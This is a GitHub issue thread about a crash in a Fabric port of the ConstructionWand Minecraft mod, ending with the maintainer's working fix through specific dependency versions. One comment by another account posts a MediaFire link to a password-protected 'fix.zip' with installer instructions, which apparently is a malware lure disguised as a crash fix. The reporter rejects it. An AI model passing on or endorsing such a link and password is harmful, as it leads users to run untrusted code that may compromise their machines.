### ISSUE TITLE
Crashing but i dont know why.

### ISSUE THREAD

**Issue by Ajsey** [JongWasTaken/ConstructionWand-Fabric#8]
Hi, this mod crashes my game but i cant find out why. Im using polymer port cuz its on 1.21.1 Here is the crash report
[crash-2024-08-26_15.46.48-client.txt](https://github.com/user-attachments/files/16749390/crash-2024-08-26_15.46.48-client.txt)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ajsey** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

i aint downloading some random files

**Comment by JongWasTaken** [comment]
Hello, thank you for opening an issue.  
  
Using the Polymer port is discouraged unless you are playing on a Polymer-enabled server.  
The 1.21 version of ConstructionWand works fine on 1.21.1 (Mojang barely changed anything).  
As for the crash, it is caused by Forge Config API Port, which is used to keep compatibility with the original Forge version of this mod.  
  
To resolve your issue:
- Make sure Fabric Loader 0.16 or newer is installed
- Install [this](https://modrinth.com/mod/forge-config-api-port/version/v21.1.0-1.21.1-Fabric) version of Forge Config API Port to override the included one and resolve the crash
- Make sure [owo-lib](https://modrinth.com/mod/owo-lib/version/0.12.11+1.21) is installed
- Unless you are playing on a Polymer server, remove the Polymer port of ConstructionWand and replace it with the normal 1.21 version, found [here](https://modrinth.com/mod/construction-wand-fabric/version/1.0.4)
  
Using these steps I was able to get an 1.21.1 instance up and running.
  
Have a great day!

**Comment by Ajsey** [comment]
> Owner

yep that worked, thank you and have a good day too
